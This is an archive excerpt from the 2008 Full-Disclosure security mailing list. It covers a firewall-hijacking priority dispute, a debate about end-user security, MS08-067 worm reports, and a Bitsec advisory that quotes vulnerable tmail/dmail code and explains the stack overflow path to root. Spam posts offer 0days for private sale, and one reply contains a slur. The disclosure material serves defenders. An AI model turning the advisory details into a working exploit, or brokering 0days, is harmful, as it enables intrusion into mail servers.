From unknown.pentester at gmail.com Sat Nov 1 03:04:33 2008
From: unknown.pentester at gmail.com (Adrian P)
Date: Sat, 1 Nov 2008 03:04:33 +0000
Subject: [Full-disclosure] Universal Website Hijacking by Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day
In-Reply-To: <5ae653bf0810311518u14272c60o19b133c3e288a529@mail.gmail.com>
References: <5ae653bf0810310131s3cc5d21cm2aacdd2c60f8dc73@mail.gmail.com> <5ae653bf0810311518u14272c60o19b133c3e288a529@mail.gmail.com>
Message-ID:

Hi Fionnbharr,

Well, that's fair enough. tbh, I couldn't find older examples, but this is one of the points of sending a post to the lists: other people can review it and give feedback. I just sometimes wished people were more constructive on FD.

Regarding the paper, well, it can be useful for people who want to find a similar issue in their firewall/proxy appliances. Don't you think? No need to call anyone names IMO. And please, why do people keep attacking Kaminsky? He has greatly contributed to the infosec community so please give him some credit!

Thanks for your email anyway. Perhaps, you could have expressed yourself in a less aggressive/more constructive manner?

Regards,
ap.

On Fri, Oct 31, 2008 at 10:18 PM, Fionnbharr wrote:
> Sure, this attack vector has been 'discovered' by lots of people in
> the past, or even concurrently, that's my point. It doesn't merit a
> whole paper on it. Not to mention you're getting on the FUD/Kaminsky
> bandwagon when GNUtards release a statement like 'New technique to
> universally hijack websites', trying to get some media attention for
> something everyone else already knew.
>
> re: the bluecoat vuln, if you read my post I just said it was a recent
> (or as you might put it, *recent*) example of this type of
> vulnerability. I've this sort of vuln myself with client software and
> so has a number of other people I know. Glad to see the majority of
> your email is completely irrelevant.
>
>
> 2008/11/1 Adrian P :
>> Hello Fionnbharr,
>>
>> Please see my response to your comments in-line.
>>
>> On Fri, Oct 31, 2008 at 8:31 AM, Fionnbharr wrote:
>>> This isn't new. It isn't even a technique.
>>>
>>> http://www.bluecoat.com/support/securityadvisories/icap_patience
>>>
>>> A very recent example of this kind of vulnerability. My god you
>>> gnucitizen people are retarded. At least you didn't give it a
>>> ridiculous name like 'clickjacking'. Can you GNUtards please keep your
>>> 'research' into subjects people already know to yourself or at least
>>> not post it to the lists, then at least I won't have to see it.
>>
>> That Bluecoat advisory was released on 29 September 2008. What makes
>> you think that I did not discover the SonicWALL vulnerability/vector
>> and reported it to ZDI *way before* that date? Well, FYI I reported it
>> to ZDI in June 2008 and discovered it even before.
>>
>> At least, you should consider the possibility of the attack vector
>> being discovered by two researchers concurrently. It can take quite a
>> few months before the vendor provides a patch, not to mention that
>> SonicWALL was VERY slow to confirm the vulnerability.
>>
>> Don't you know that responsible disclosure means that the details of a
>> vulnerability can be held for quite a while before being released to
>> the public? Since when the publishing date of an advisory is equal to
>> discovery date?
>>
>> Furthermore, it appears that Bluecoat only released their advisory
>> *after* the researcher jplopezy made his advisory public, which could
>> suggest that he did NOT inform the vendor before releasing the
>> details:
>>
>> http://www.securityfocus.com/archive/1/496940/30/0/threaded
>>
>> It's also interesting that the researcher released the advisory
>> (bugtraq post) one day *after* I published the general description of
>> the attack:
>>
>> June 25th, 2008.
>> ZDI forwards my findings to SonicWALL (see "Disclosure Timeline"):
>> http://www.zerodayinitiative.com/advisories/ZDI-08-070/
>>
>> September 20th, 2008.
>> I publish the general description of the attack:
>> http://www.gnucitizen.org/blog/new-technique-to-perform-universal-website-hijacking/
>>
>> September 21st, 2008.
>> Researcher jplopezy finds the same attack vector on BlueCoat's web filter:
>> http://www.securityfocus.com/archive/1/496577/30/0/threaded
>>
>> Notice jplopezy published the bugtraq post *one day after* I published
>> the general attack description on GNUCITIZEN. Interesting?
>>
>> Please do your homework before making any accusations.
>>
>>>
>>> Also "Malaysia: Cracking into Embedded Devices and Beyond!", who the
>>> fuck uses the word 'cracking' instead of 'hacking' in 2008? Sure for
>>> cracking passwords, but wow.
>>
>> Can't you accept the idea some of us still consider hacking and
>> breaking into a system not necessarily the same thing?
>>
>> Regards,
>> ap.
>>
>>>
>>> 2008/10/31 Adrian P :
>>>> Hello folks,
>>>>
>>>> Yesterday, I presented for the first time [1] a new method to perform
>>>> universal website hijacking by exploiting content filtering features
>>>> commonly supported by corporate firewalls. I briefly discussed [2] the
>>>> finding on GNUCITIZEN in the past without giving away the details, but
>>>> rather mentioning what the attacker can do and some characteristics of
>>>> the attack.
>>>>
>>>> Anyway, I'm now releasing full details on how the technique works, and
>>>> a real 0day example against SonicWALL firewalls.
>>>>
>>>> The paper can be found on the GNUCITIZEN labs site. Please let me know
>>>> if you can successfully use the same technique against firewalls by
>>>> other vendors:
>>>>
>>>> http://sites.google.com/a/gnucitizen.org/lab/research-papers
>>>>
>>>> Finally, I'd like to thank Zero Day Initiative [3] for their great
>>>> work and the Hack in the Box crew for organizing such a fine event!
>>>>
>>>> Regards,
>>>> ap.
>>>>
>>>> REFERENCES
>>>>
>>>> [1] "HITBSecConf2008 - Malaysia: Cracking into Embedded Devices and Beyond!"
>>>> http://conference.hackinthebox.org/hitbsecconf2008kl/?page_id=186
>>>>
>>>> [2] "New technique to perform universal website hijacking"
>>>> http://www.gnucitizen.org/blog/new-technique-to-perform-universal-website-hijacking/
>>>>
>>>> [3] "SonicWALL Content-Filtering Universal Script Injection Vulnerability"
>>>> http://www.zerodayinitiative.com/advisories/ZDI-08-070/
>>>>
>>>> --
>>>> Adrian "pagvac" Pastor | GNUCITIZEN
>>>> gnucitizen.org
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>

From h2glabs.infosec at gmail.com Sun Nov 2 23:34:35 2008
From: h2glabs.infosec at gmail.com (H2G-Labs Information Security)
Date: Sun, 2 Nov 2008 20:34:35 -0300
Subject: [Full-disclosure] i sh0t the white hat eDiçãO 4 (PR0J3KT M4YH3M BR4Z1L)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

The new version (4) of the "i sh0t the white hat" zine (PR0J3KT M4YH3M BR4Z1L).

URL: http://rs417.rapidshare.com/files/160091755/istwh4.txt

These guys do a good job counter some pseudo elite kids and CISSPs at Brazil. In this version, we can see a funny hack counter Nash Leon (Glaudson O Campos). :P

Regards...
- --
H2G-Labs Information Security
Igor Marcel - Information Security Consultant
H2GLabs.InfoSec "at" Gmail.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG (PRIVATE)
Comment: H2G-Labs Information Security
-----END PGP SIGNATURE-----

From 3APA3A at SECURITY.NNOV.RU Mon Nov 3 00:32:21 2008
From: 3APA3A at SECURITY.NNOV.RU (Vladimir '3APA3A' Dubrovin)
Date: Mon, 3 Nov 2008 03:32:21 +0300
Subject: [Full-disclosure] iDefense Security Advisory 10.30.08: Adobe PageMaker Key Strings Stack Buffer Overflow
In-Reply-To: <490A1803.9090909@idefense.com>
References: <490A1803.9090909@idefense.com>
Message-ID: <81123797.20081103033221@SECURITY.NNOV.RU>

Dear iDefense Labs,

--Thursday, October 30, 2008, 11:24:35 PM, you wrote to bugtraq at securityfocus.com:

iL> VII. CVE INFORMATION
iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the
iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in
iL> the CVE list (http://cve.mitre.org/), which standardizes names for
iL> security problems.
I bet it should be CVE-2007-6432

--
~/ZARAZA http://securityvulns.com/

From xploitable at gmail.com Sun Nov 2 05:38:20 2008
From: xploitable at gmail.com (n3td3v)
Date: Sun, 2 Nov 2008 05:38:20 +0000
Subject: [Full-disclosure] Securing our computers?
Message-ID: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>

does anyone have good ideas on how to secure our computers better? is it a problem at the user end, or a problem at the corporate and government end? should it be up to vendors to provide security to operating systems, or should it be the end users responsibility to learn the skills required to use a computer safe and securely, and its data assets that might be stored on the systems? these are the sorts of questions you should ask yourself.

should we really have operating systems with a built in firewall that is turned on by default, what i call back seat driver security. this is a term im using for vendors who provide end users with ready to go security measures, but don't teach its users about security, they just provide the security mechanisms to the user, without telling the user about security and why its important for the firewall to be there. should security be expected, back seat security? or should we be road mapping with the end user, by saying, we provide you with default security, but we want you to learn more about the security of computers, and all its technical and non-technical surroundings.

is it healthy that vendors are back seating its users by providing point, click security which is extremely lazy for the end user. the end user doesn't need to do anything, or think about anything to do with computer security, because its already provided by the vendor. the problem arises when new threats come about and the security that the user expects can't protect their computer and its data because the vendor hasn't had time to notify its security response staff and build and release a patch.
so what layer of protection does the end user with point and click back seat security have against a new emerging threat to our computer systems? none. the vendors don't provide the education for the end user to mitigate new emerging threats, they are told to wait for a patch, there are no effective workarounds usually that you can use to protect yourself from a new emerging threat, workarounds usually only make it less likely you'll be infected with malicious code, but i don't think its security, its just the best we can do. should we not force our users to learn about computer security instead of providing them with instant-on security? the real threats come from those vulnerabilities that are not-yet-patched, where the operating system is at its most vulnerable, yet the user has no clue about what's going on, because they haven't been encouraged by the vendor, to learn about security, its just expected by the user that the system is 1) not break in able and 2) hasn't already been compromised. if you turn your computer on and everything looks in place and as it should, you suggest to yourself you haven't been hacked, however that is not the case, although that is the mindset the end user has, if everything looks ok, then it probably is or so they assume. do you ever think what could be happening to your computer while your screensaver is running, could this be the perfect opportunity for a hacker, to start looking around the system files, a tip off perhaps that you are away from the computer, and can't see what's going on behind the graphic that is screensaving your operating system? these are the kind of questions we should be asking ourselves, because security is assumed by the end user, they are putting an incredible amount of trust in the vendor who provides the software, and is it healthy to have your data security in the hands of the vendor. 
when you buy say microsoft windows you don't own that software, you own a licence to run it on your systems, you never actually own the product, you are merely signing an agreement that microsoft has given you permission to use the software. the code is infact secret and will probably stay that way for some time, because its how they work, they don't like "free", they don't make money from "free" so they keep the code base secret from the user who owns the licence to run the software, although the user doesn't know exactly what it is that is running on their system, as they don't have open source to view what's really going on. with companies such as microsoft keeping its source code a secret, you've got to wonder what are they hiding, and why should you put your trust in such a large corporation to not only provide the services you agree on the software licence but the security of not only you and your computer, but the data that is held on that software. its all about trusting the security of the operating system, and people seem to trust big companies with their security, but are they trustable? its a huge amount of trust you give microsoft everytime you agree to their licence terms, most people just sit back and agree, most don't even read the small print, this is sad. you are running a software that you don't own, are merely borrowing the use of, and that software will eventually expire and you need to repay the company every say 4 to 8 years per software life cycle. so essentially, why are you using microsoft windows, and why are you putting your trust in them? not only that but why are they providing security to the end user, without sharing the code or encouraging the end user to find out more about security. like i said, security is assumed, but it cannot be guaranteed. 
they don't say hey, its a pretty good idea that you know about new threats and how to mitigate them, the end user shouldn't be relying on security professionals to keep their data secure, there is nothing a security professional knows that the end-user can't find out, so why are we not steering the end user towards computer security websites? because they don't want to learn, they don't see the need to learn, the security is provided by the vendor, the one we put our trust in to provide a secure code base to run our commands in a graphical environment. the end-user doesn't know about security, the end-user doesn't really understand what it is that is running, they know its microsoft windows, but do they know about the possible threat vectors, and are they up-to-speed with security news? no, but they should be but aren't encouraged to be or even think about security, because the vendor does it for them, the people you trust.

From biz.marqee at gmail.com Mon Nov 3 04:31:35 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Mon, 3 Nov 2008 15:31:35 +1100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
Message-ID:

tl;dr

now i am going back to my real job, doing real things and you can go back to playing with lego and waiting for your mother to bring in some sandwiches cut into triangles. without the crust.

faggot.

From Valdis.Kletnieks at vt.edu Mon Nov 3 04:59:31 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 02 Nov 2008 23:59:31 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: Your message of "Sun, 02 Nov 2008 05:38:20 -0000."
    <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
Message-ID: <45950.1225688371@turing-police.cc.vt.edu>

On Sun, 02 Nov 2008 05:38:20 -0000, n3td3v said:
> does anyone have good ideas on how to secure our computers better?

Good ideas? Those of us who have been doing this for decades have *plenty* of those. Good ideas that are both (a) practically deployable and (b) workable in practice? Those are in short supply.

Your long rant is just beginning to scratch the *surface* of the issues involved. There's a very basic design problem: People think they want their computers to be generalized Von Neumann architectures, and resist attempts to give them something that's more a Harvard architecture - go look at the debacle that was WebTV for what happens when you try to give them a closed-box that's no-user-modifiable-parts-inside by design.

It's *easy* to design an appliance that's reasonably secure. Look at the relative difficulty of hacking a Wii compared to hacking a Windows XP box.

What we *don't* know how to do is make a system that Joe Sixpack is allowed to screw around with, and yet prevent security issues from happening. The only *real* solution here is to invent a better Joe Sixpack that's able to understand that security should be more important than the neat screensaver he just downloaded with no clue as to the code's provenance.

Unfortunately, the Joe Sixpacks tend to marry Jill Sixpacks, and reproduce. Anybody who's read CM Kornbluth's "The Marching Morons" will immediately recognize it as the *current* situation of most white hats.

From antisec.0day at gmail.com Mon Nov 3 07:37:23 2008
From: antisec.0day at gmail.com (anti security)
Date: Mon, 3 Nov 2008 08:37:23 +0100
Subject: [Full-disclosure] 0day offer.
Message-ID:

Dear people,

I 'm proposing some really interesting 0days for Windows && Linux. Please answer only by private email.

See you soon

From xploitable at gmail.com Mon Nov 3 08:18:26 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 08:18:26 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <45950.1225688371@turing-police.cc.vt.edu>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <45950.1225688371@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310811030018j59a4fe45u9422bc05b7769f95@mail.gmail.com>

a discussion on n3td3v mailing list is talking about stateless computing to take the security responsibility away from the single mom and retired couple crowd. some on the mailing list think that is the answer to security problems, but i don't agree i think its just shifting the problems to different places.

again, if stateless computing and cloud computing is going to become a big thing for joe average sixpack, then the issue of trust comes into play again. are we to trust big corporations with stateless computing if all our data is to be held at one central data farm and for the majority of joe average sixpack computers to become something that resembles dumb terminals.

On Mon, Nov 3, 2008 at 4:59 AM, wrote:
> What we *don't* know how to do is make a system that Joe Sixpack is allowed
> to screw around with, and yet prevent security issues from happening. The
> only *real* solution here is to invent a better Joe Sixpack that's able to
> understand that security should be more important than the neat screensaver
> he just downloaded with no clue as to the code's provenance.
>
> Unfortunately, the Joe Sixpacks tend to marry Jill Sixpacks, and reproduce.
> Anybody who's read CM Kornbluth's "The Marching Morons" will immediately
> recognize it as the *current* situation of most white hats.

From mcwidget at gmail.com Mon Nov 3 10:08:01 2008
From: mcwidget at gmail.com (mcwidget)
Date: Mon, 3 Nov 2008 10:08:01 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <45950.1225688371@turing-police.cc.vt.edu>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <45950.1225688371@turing-police.cc.vt.edu>
Message-ID: <4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>

>
> What we *don't* know how to do is make a system that Joe Sixpack is allowed
> to screw around with, and yet prevent security issues from happening.
>

This is the real problem. There are *some* things that can be done, I'd like to see some form of NAP built into home routers that verifies your home PC against a baseline before allowing you to go online. You want to go to Google? Sure, but your AV's out of date and you've missed this week's patches, how about I only let you to norton.com and microsoft.com until you've updated? Let users do what they want with their PCs and put some of the security logic in the 'other' machine they have at home. What if they want to go online without updating though?

Therein is where most solutions will fall down. Either end/home users are allowed full control of their machines to do with what they will or that control is completely taken away from them - there's no middle ground.

Given that, even though the user is currently the weakest link in the security chain it's a link that should be regarded as inherently insecure.
Fixing the user is the obvious solution but it's also the least likely.

From Valdis.Kletnieks at vt.edu Mon Nov 3 10:33:00 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 05:33:00 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: Your message of "Mon, 03 Nov 2008 10:08:01 GMT."
    <4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <45950.1225688371@turing-police.cc.vt.edu> <4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
Message-ID: <62583.1225708380@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 10:08:01 GMT, mcwidget said:

> This is the real problem. There are *some* things that can be done, I'd
> like to see some form of NAP built into home routers that verifies your home
> PC against a baseline before allowing you to go online. You want to go to
> Google? Sure, but your AV's out of date and you've missed this week's
> patches, how about I only let you to norton.com and microsoft.com until
> you've updated? Let users do what they want with their PCs and put some of
> the security logic in the 'other' machine they have at home. What if they
> want to go online without updating though?

Given the number of things that simply aren't detected/removed by current AV solutions, what makes you think that this would make any real measurable difference?

For that matter, what makes you think that this hypothetical NAP would be any more secure?

Hint 1: consider the security of most consumer-grade cablemodems before you answer.

Hint 2: How does this NAP identify that you're behind on AV updates?

> Therein is where most solutions will fall down. Either end/home users are
> allowed full control of their machines to do with what they will or that
> control is completely taken away from them - there's no middle ground.

And somehow, I doubt people will buy an XBox 360 that happens to have IE, MS Office, and an IM client installed on it (even if that's what they actually *need*).

From mcwidget at gmail.com Mon Nov 3 11:26:30 2008
From: mcwidget at gmail.com (mcwidget)
Date: Mon, 3 Nov 2008 11:26:30 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <62583.1225708380@turing-police.cc.vt.edu>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <45950.1225688371@turing-police.cc.vt.edu> <4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com> <62583.1225708380@turing-police.cc.vt.edu>
Message-ID: <4e324cb0811030326t168d1616q5e4f9bc025bdde83@mail.gmail.com>

>
> Given the number of things that simply aren't detected/removed by current
> AV solutions, what makes you think that this would make any real measurable
> difference?
>
> For that matter, what makes you think that this hypothetical NAP would be
> any more secure?
>

A solution like this wouldn't make any difference to users who already keep their AV / patch status up-to-date, of course it wouldn't. What it may do, is increase the % of home users who keep their AV / patch status up-to-date. This, would be a Good Thing.

As to the security of the box itself, you're right, it may not be any more secure than any cable modem box currently out there. What could be done though, is the security on these boxes could be tightened/restricted to our heart's content as this would not impact the user's everyday use.

Most users want their home PCs to be secure.
The problem is, they want ease-of-use more. I've lost count of the number of users who think they *need* a firewall but who automatically click "Allow" on their firewall pop-ups because "that stopped it coming back". By moving some security logic onto a different box in the home, that box can be tightened/restricted without affecting the user.

This isn't a silver bullet, of course there are problems with this. This is intended as an example of things that may help.

From antisec.0day at gmail.com Mon Nov 3 11:36:25 2008
From: antisec.0day at gmail.com (anti security)
Date: Mon, 3 Nov 2008 12:36:25 +0100
Subject: [Full-disclosure] Odays offers
Message-ID:

Dear people,

I 'm proposing some really interesting 0days for Windows && Linux. Please answer only by private email.

See you soon

From viktor.larionov at salva.ee Mon Nov 3 11:54:44 2008
From: viktor.larionov at salva.ee (Viktor Larionov)
Date: Mon, 3 Nov 2008 13:54:44 +0200
Subject: [Full-disclosure] Odays offers
In-Reply-To:
Message-ID:

[Viktor Larionov]
>> See you soon

In jail. :)

vik

From infolookup at gmail.com Mon Nov 3 12:29:16 2008
From: infolookup at gmail.com (infolookup at gmail.com)
Date: Mon, 3 Nov 2008 12:29:16 +0000
Subject: [Full-disclosure] 0day offer.
In-Reply-To:
References:
Message-ID: <328727592-1225715340-cardhu_decombobulator_blackberry.rim.net-1699214772-@bxe360.bisx.prod.on.blackberry>

Stop being a spammer!!!!!
Sent from my Verizon Wireless BlackBerry

-----Original Message-----
From: "anti security"
Date: Mon, 3 Nov 2008 08:37:23
To:
Subject: [Full-disclosure] 0day offer.

From juha-matti.laurio at netti.fi Mon Nov 3 13:52:13 2008
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Mon, 3 Nov 2008 15:52:13 +0200 (EET)
Subject: [Full-disclosure] Windows RPC worm (MS08-067) in the wild
Message-ID: <27140334.291881225720334202.JavaMail.juha-matti.laurio@netti.fi>

The worm-type exploitation has started. More information at
http://www.f-secure.com/weblog/archives/00001526.html

The worm component has reportedly detection name Exploit.Win32.MS08-067.g and the kernel component Rootkit.Win32.KernelBot.dg, in turn.

Symantec uses Worm category too and the name W32.Wecorl:
http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-110306-2212-99&tabid=2

Juha-Matti

From arasm at vt.edu Mon Nov 3 14:05:45 2008
From: arasm at vt.edu (Memisyazici, Aras)
Date: Mon, 3 Nov 2008 09:05:45 -0500
Subject: [Full-disclosure] Securing our computers?
Message-ID: <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>

:
>> the security on these boxes could be tightened/restricted to our heart's content as this would not impact the user's everyday use.

:) As someone who shares geographical commonality and is honored to be a 'padawan' of Valdis, when I brought up something very similar to this argument a while back, I was smacked down so bad by him and his peers, it still hurts to remember that day!
:p

In any event, before y'all make even more 'human' comments like the one above, please consider that:

A) you are dealing with an extremely considerate and intelligent man who has and continues to put up with this very question among many other things on a daily basis, while pretending to be a regular IT guy :)

B) The suggestion you made mcwidget is pretty much (I'm very sad to agree) 'just not worth it'... To expand, design a model keeping the following factors in mind:

* cost of implementing such technique onto existing hardware (i.e. Openwrt like systems) vs. distributing new hardware

* cost of the load that will be placed on the vendor's support team for this project (don't forget that vendors will be hiring Punjab-I-read-Scripts farms so calculate for the 'hold please!' and the customer getting so aggravated due to false-neg's/pos's or just plain non-functionality that they cont. to waste support resources over and over and ...)

* cost of maintaining a team of clued -IT prof.'s who will create/update a central db of sig's on extreme hardware by cooperating with other vendors who will deliberately shoot down attempts b/c such a product will drive down their sales (not everyone cares for the greater good, in today's greedy society)

* speed of adaptation of said technology, given all the lovely comments it will be receiving from early-Joe/Jill Sixpackers blogs/sites who had no idea how to use it other than they were told it's a 'Good Thing', and given a Flash video demonstrating how they can implement the device with its color-coded cabling and free-of-charge 1st support call if all else failed!

* The cost on the vendor with all the returns it receives back

***###***###***###***###***###***###

(there were more factors but after the 6th or 7th hit to the back of the head, you tend to lose way too many memory cells to remember all :p)

Now...
Don't get me wrong, I totally agree with you, at first it sounds like a great idea to implement NAC/P like technology for the reg. Joe/Jill out there... But as you can all deduce it's just not pheaseable in the 'Real World'. As for your original comment and why I singled it out... So... Your scenario assumed successful implementation of the tech. by the user... And totally disregarded false-negatives and false-positives... So here's Joe Sixpack staring at this warning sign saying, 'according to our immature calculations 'something isn't right', so we're gonna let you figure that out by allowing you to only go to our approved 3rd party/marketing associate sites (which others can also join the network for a pheaseable fee) or by calling us at 800-OUTSRC-IT and wasting 2-3 hours on the phone to figure out that our central db doesn't include signatures for your AV/firewall/anti-malware combo yet... Sincerely, Aras 'Russ' Memisyazici Systems Administrator Office of the Vice President for Research Virginia Tech From juha-matti.laurio at netti.fi Mon Nov 3 14:39:13 2008 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Mon, 3 Nov 2008 16:39:13 +0200 (EET) Subject: [Full-disclosure] Windows RPC worm (MS08-067) in the wild Message-ID: <30135925.297171225723154006.JavaMail.juha-matti.laurio@netti.fi> Kaspersky detect the new wave as Exploit.Win32.MS08-067.g and Microsoft as Exploit:Win32/MS08067.gen!A Sophos uses name Mal/Generic-A. One of the reported file size is 16,384 bytes: http://www.threatexpert.com/report.aspx?uid=919a973d-9fe1-4196-b202-731ebaaffa5d Windows RPC vulnerability (MS08-067) FAQ has been updated to include these detection names: http://blogs.securiteam.com/index.php/archives/1150 Juha-Matti Juha-Matti Laurio [juha-matti.laurio at netti.fi] kirjoitti: > The worm-type exploitation has started. 
> More information at
> http://www.f-secure.com/weblog/archives/00001526.html
>
> The worm component has reportedly detection name Exploit.Win32.MS08-067.g and the kernel component Rootkit.Win32.KernelBot.dg, in turn.
>
> Symantec uses Worm category too and the name W32.Wecorl:
> http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-110306-2212-99&tabid=2
>
> Juha-Matti
>

From Valdis.Kletnieks at vt.edu Mon Nov 3 14:46:09 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 09:46:09 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: Your message of "Mon, 03 Nov 2008 09:05:45 EST." <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>
References: <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>
Message-ID: <74343.1225723569@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 09:05:45 EST, "Memisyazici, Aras" said:

> * cost of maintaining a team of clued -IT prof.'s who will create/update a
> central db of sig's on extreme hardware by cooperating with other vendors who
> will deliberately shoot down attempts b/c such a product will drive down their
> sales (not everyone cares for the greater good, in today's greedy society)

Actually Russ - you're not quite right on this one. Down in the trenches, the various A/V techies *do* cooperate across company boundaries an awful lot - although actual signatures aren't much use to exchange because the engines that interpret them are proprietary and dissimilar, samples get exchanged *all* the time (where do you *think* all those samples that get sent to virustotal.com go? :), and hints/suggestions of what they've managed to RE of the sample's structure and behavior - "Hey, it's using the WizBang packer, and you probably wanna look at this registry entry, and...."

Think for a moment: how come Symantec can release a pattern only 3 hours after they see the first sample - and they already know what their competitors are calling the critter?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/2b67ccfc/attachment.bin

From labs at bitsec.com Mon Nov 3 11:55:24 2008
From: labs at bitsec.com (Bitsec Labs)
Date: Mon, 3 Nov 2008 12:55:24 +0100
Subject: [Full-disclosure] Bitsec Security Advisory: UW/Panda IMAP [dt]mail buffer overflow
Message-ID: <20081103115524.GA6409@aron-laptop>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===============================================================================
Bitsec Security Advisory: UW/Panda IMAP [dt]mail buffer overflow 2008-11-03
===============================================================================

Applications   tmail/dmail in UW IMAP [2002-2007c], Panda IMAP, Alpine <= 2.00
Discovered by  Aron Andersson , Jan Sahlin
Researched by  Aron Andersson
Reference      http://www.bitsec.com/en/rad/bsa-081103.txt
GPG Key        http://www.bitsec.com/labs.asc

Overview

tmail and dmail are mail delivery agents that deliver mail to a user's INBOX or a designated folder, specified by the folder extension in the user+folder argument on the command line. If tmail is used for mail delivery from a process whose UID is not the destination user, it must be installed setuid root; dmail can be used when the process is run as the destination user.

Problem

A vulnerability exists in both applications due to missing boundary checks on the folder extension argument from the command line. The bug can be exploited by overflowing a stack buffer via an overly long folder name. For tmail, this could allow for arbitrary code execution as the root user. As mentioned the vulnerability also exists for dmail, but the impact is a bit less critical since it usually runs as the recipient user and not root. Depending on the mailer daemon and configuration in use, this bug may also be remotely exploitable.
The bug is caused by the following pieces of code:

[tmail.c]

    char *getusername (char *s,char **t)
    {
      char tmp[MAILTMPLEN];
      if (*t = strchr (s,'+')) {    /* have a mailbox specifier? */
        *(*t)++ = '\0';             /* yes, tie off user name */
                                    /* user+ and user+INBOX same as user */
        if (!**t || !strcmp ("INBOX",ucase (strcpy (tmp,*t)))) *t = NIL;
      }
      return s;                     /* return user name */
    }

[dmail.c]

    int deliver (FILE *f,unsigned long msglen,char *user)
    {
      MAILSTREAM *ds = NIL;
      char *s,*mailbox,tmp[MAILTMPLEN],path[MAILTMPLEN];
      STRING st;
      struct stat sbuf;
                                    /* have a mailbox specifier? */
      if (mailbox = strchr (user,'+')) {
        *mailbox++ = '\0';          /* yes, tie off user name */
        if (!*mailbox || !strcmp ("INBOX",ucase (strcpy (tmp,mailbox))))
          mailbox = NIL;            /* user+ and user+INBOX same as user */
      }
      (..)

The user+folder command line argument reaches deliver() and getusername() through the char pointers 's' and 'user', respectively. The folder part is separated from the user and copied to the buffer 'tmp'. Since 'tmp' is placed on the stack, an overly long folder name can be used to overwrite stack data, including but not limited to the saved EIP.
Exploit

A proof-of-concept exploit for this vulnerability has been developed but will not be publicly released until 2008-11-10, by which time it can be found at http://www.bitsec.com/en/rad/bsa-081103.c

Fix

Upgrade to the latest version from your IMAP vendor:

- UW IMAP: 2007d
  http://www.washington.edu/imap/
- Panda IMAP: tmail ver 2008.24, dmail ver 2008.19
  http://www.panda.com/imap/
- Alpine: No fix, tmail/dmail users should get UW IMAP 2007d
  http://www.washington.edu/alpine/

Disclosure Timeline

2008-10-24  Notified developers (Mark Crispin, Steve Hubert)
2008-10-27  Received response from developers
2008-10-27  Panda IMAP patched
2008-10-30  UW IMAP patched
2008-11-03  Public release

===============================================================================
Bitsec Security Advisory: UW/Panda IMAP [dt]mail buffer overflow 2008-11-03
===============================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFJDuPnzx20c5GX95oRApDFAKCLzTOOPmHsoGCcgxkbZvtCSFQujgCgugO/
yjilZ4XHBYXTPEXbVVnS7Rk=
=OsgS
-----END PGP SIGNATURE-----

From Simon.Richter at hogyros.de Mon Nov 3 14:42:02 2008
From: Simon.Richter at hogyros.de (Simon Richter)
Date: Mon, 3 Nov 2008 15:42:02 +0100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
Message-ID: <20081103144201.GA3847@richter>

Hi,

> does anyone have good ideas on how to secure our computers better? is
> it a problem at the user end, or a problem at the corporate and
> government end?

It's a problem at the geek end, i.e. with the people who actually build the systems. We like our systems to be incredibly customizable and powerful, so we build them this way.

For example, when the X Window System reports an input event to an application, a flag tells the app whether the event is "synthetic", i.e.
